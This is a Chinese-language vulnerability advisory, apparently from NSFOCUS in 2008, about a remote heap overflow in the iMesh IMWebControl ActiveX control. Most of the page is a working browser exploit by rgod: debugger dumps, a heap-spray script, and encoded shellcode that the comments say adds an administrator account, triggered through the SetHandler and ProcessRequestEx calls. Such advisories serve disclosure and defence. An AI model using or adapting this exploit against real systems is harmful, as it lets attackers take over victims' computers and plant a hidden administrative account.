安全研究
安全漏洞
iMesh <= 7.1.0.x IMWebControl类远程堆缓冲区溢出漏洞
发布日期:2008-02-25
更新日期:2008-02-25
受影响系统:
iMesh iMesh 7.0.0.x描述:
iMesh iMesh
iMesh是文件共享及在线社交网络,使用专用的集中式P2P协议。
IMWeb.dll 7.0.0.x在IMWebControl类的实现上存在远程堆缓冲区溢出漏洞,可使攻击者破坏受影响应用,造成拒绝服务。
<*来源:rgod (rgod@autistici.org)
链接:http://www.bitscn.com/network/hack/200802/123579.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
iMesh <= 7.1.0.x IMWebControl Class (IMWeb.dll 7.0.0.x) remote heap exploit
(IE7/XP full patched)
by rgod, site: http://retrogod.altervista.org/
software site: http://www.imesh.com
"iMesh is a file sharing and online social network. It uses a proprietary,
centralized, P2P protocol. iMesh is owned by an American company iMesh,
Inc. and maintains a development center in Israel.
iMesh was the first company to introduce "swarming" - the ability to download
one file from multiple sources, increasing download speed."
This is the problem with Imesh client :
passing an empy value to ProcessRequestEx method
EAX 9F291974
ECX 4D554E00 WINHTTP.4D554E00
EDX 017EF438
EBX 00000000
ESP 017EF410
EBP 017EF430
ESI 017EF438
EDI 01F51FF8
EIP 01F23A9C IMWebCon.01F23A9C
...
01F23A90 8B8F A8000000 MOV ECX,DWORD PTR DS:[EDI+A8]
01F23A96 8B01 MOV EAX,DWORD PTR DS:[ECX]
01F23A98 52 PUSH EDX
01F23A99 8BD6 MOV EDX,ESI
01F23A9B 52 PUSH EDX
01F23A9C FF10 CALL DWORD PTR DS:[EAX] <----- crash
apparently this was unexploitable, ecx points to winhttp.dll which
keeps 0x9f291974, but I found that thru the SetHandler sub
you can hijack ecx to an arbitrary value...
So, setting the value to 218959117 you have:
EAX 017EF438
ECX 0D0D0D0D
EDX 017EF43C
EBX 00000000
ESP 017EF418
EBP 017EF430
ESI 017EF438
EDI 01EF1FF8
EIP 01EC3A96 IMWebCon.01EC3A96
...
01EC3A90 8B8F A8000000 MOV ECX,DWORD PTR DS:[EDI+A8]
01EC3A96 8B01 MOV EAX,DWORD PTR DS:[ECX] <------- crash
01EC3A98 52 PUSH EDX
01EC3A99 8BD6 MOV EDX,ESI
01EC3A9B 52 PUSH EDX
01EC3A9C FF10 CALL DWORD PTR DS:[EAX]
Access violation when reading 0D0D0D0D
Now it is exploitable...
This add an administrative account
I used various stages of heap spray, do not crash just freeze, worked fine, 80%
-->
<html>
<object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9' id='IMWebControl' /></object>
<SCRIPT language="javascript">
//add su one, user: sun pass: tzu
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u
426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<77;i++){memory[i] = block+shellcode}
bigblock = unescape("%u0707%u0707");
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
for (i=77;i<144;i++){memory[i] = block+shellcode}
bigblock = unescape("%u0909%u0909");
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
for (i=144;i<500;i++){memory[i] = block+shellcode}
</script>
<script language='vbscript'>
puf=218959117 'set ecx to 0x0d0d0d0d
IMWebControl.SetHandler puf
puf=""
IMWebControl.ProcessRequestEx puf
</script>
</html>
建议:
厂商补丁:
iMesh
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.imesh.com
浏览次数:2474
严重程度:0(网友投票)
绿盟科技给您安全的保障